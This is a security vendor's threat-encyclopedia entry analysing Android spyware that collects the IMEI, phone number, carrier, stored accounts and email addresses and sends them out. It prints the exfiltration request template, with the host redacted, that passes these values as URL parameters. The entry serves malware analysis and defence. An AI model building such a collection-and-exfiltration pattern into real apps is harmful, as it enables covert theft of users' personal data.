Threat Encyclopedia

Android/SndApp.A!tr.spy

description-logoAnalysis

Android/SndApp.A!tr.spy targets Android mobile phones. It sends to a remote web server several personal information including the email addresses of the victim.
The application displays a splash screen such as Figure 1.

Figure 1. Splash screen for Android/SndApp.A!tr.spy
If you press the icon on the top right corner, a list of affiliate apps are shown (see Figure 2). Those applications come from the same developer and show the same information-leaking behaviour.

Figure 2. Affiliate applications
Those applications have been removed from the Android Market.


Technical Details


When the malware is launched, it collects:
  • phone's IMEI
  • phone number
  • network country iso (e.g "fr")
  • operator's name
  • accounts memorized on the mobile phone. This corresponds to all web accounts an end-user has his/her phone memorize so that he/she does not need to enter his/her credentials at each login. For instance, this can be Google accounts, Facebook accounts, e-Commerce accounts etc.
  • emails: emails of the victim. Actually, those emails are collected from the login names specified in the accounts above. When a login name looks like an e-mail (e.g it has an @ inside), the malware assumes it is an email, and collects it.
This information is sent to a remote web site:
http://[REMOVED].com/android-notifier/notifier.php?
   appId=1&deviceId=IMEI&mobile=PHONENUMBER&country=ISOCOUNTRY
   &carrier=OPERATORNAME&email=EMAILS
When pressing the icon for affiliate applications, the malware issues several requests to:
http://[REMOVED]ck66.com/mt/w264y234e4z2y2/&subid1=inapp
which redirect to the related applications.

recommended-action-logoRecommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.